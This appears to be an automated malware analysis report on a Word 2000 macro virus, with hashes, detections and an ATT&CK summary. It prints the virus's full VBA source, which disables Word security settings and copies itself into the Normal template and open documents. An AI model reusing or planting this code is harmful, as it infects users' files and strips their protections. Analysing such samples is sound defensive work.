Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ad122930c04ed1b…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-03-13 12:43:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: db396afc13299be0309e1896c7601140 SHA-1: efdb59975af1f8ecd979ce9cbb97733be1f70618 SHA-256: 4ad122930c04ed1b8fd57d6958a3a7252e8227071b79bfdf953a726859fd2885
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. The macro attempts to disable security settings and write its own code to a file named 'C:\hjg.FKH' before attempting to save it to the active document and the Normal template. This behavior suggests an attempt to establish persistence or facilitate further infection. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Win.Trojan.C-286' further indicate malicious intent.

Heuristics 2

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2218 bytes
SHA-256: 15425e1680d84c74addc0cf1a2dabad9a44ed104acd43c22a5f2016968b451d8
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'
' Virus Name : hjg
' Virus Author : The WalruS Virus Engine (WVE) Random Virus Utility

' A Virus Created By The WalruS Virus Engine (WVE)

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub FilePrintDefault()
    Call USB2628
End Sub
Private Sub USB2628()
On Error Resume Next
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
ActiveDocument.ReadOnlyRecommended = False
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Set FCN8359 = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set HPO6156 = ActiveDocument.VBProject.VBComponents(1).CodeModule
ISA6399 = "C:\hjg.FKH"
Open ISA6399 For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 0)
Close #1
If FCN8359.Lines(1, 1) <> "'" Then
    FCN8359.DeleteLines 1, FCN8359.CountOfLines: FCN8359.AddFromFile ISA6399
End If
If HPO6156.Lines(1, 1) <> "'" Then
    HPO6156.DeleteLines 1, HPO6156.CountOfLines: HPO6156.AddFromFile ISA6399
    ActiveDocument.Save
End If
Kill ISA6399
ESR8101 = Int(Rnd * 44)
If Trigger = 3 Then Call ELA9086
End Sub
Private Sub ELA9086()
On Error Resume Next
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub
' Another Virus Created By The WalruS Virus Generator (WVE) Version 1.10